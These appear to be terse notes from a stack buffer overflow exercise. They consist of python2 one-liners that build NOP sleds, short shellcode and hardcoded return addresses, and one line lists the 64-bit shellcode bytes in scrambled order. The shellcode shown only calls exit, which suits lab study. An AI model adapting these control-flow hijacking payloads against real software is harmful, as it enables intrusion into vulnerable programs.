
`python2 -c "print '\x90' * 168+ '\x10\xe5\xff\xff\xff\x7f'"`

48 31 ff 48 31 c0 66 83  c7 0c b0 3c 0f 05

\x48\xff\x31\x48\x83\x66\xc0\x31\x0f\x3c\xb0\x0c\xc7\x05
\x48\x31\xff\x48\x31\xc0\x66\x83\xc7\x0c\xb0\x3c\x0f\x05

`python2 -c "print '\x90' * (168-14) + '\x48\x31\xff\x48\x31\xc0\x66\x83\xc7\x0c\xb0\x3c\x0f\x05' + '\x60\xe5\xff\xff\xff\x7f'"`


\x31\xdb\x31\xc0\xb3\x0d\xb0\x01\xcd\x80

`python2 -c "print '\x90' * (140-10) + '\x31\xdb\x31\xc0\xb3\x0d\xb0\x01\xcd\x80' + '\xf0\xd6\xff\xff'"`
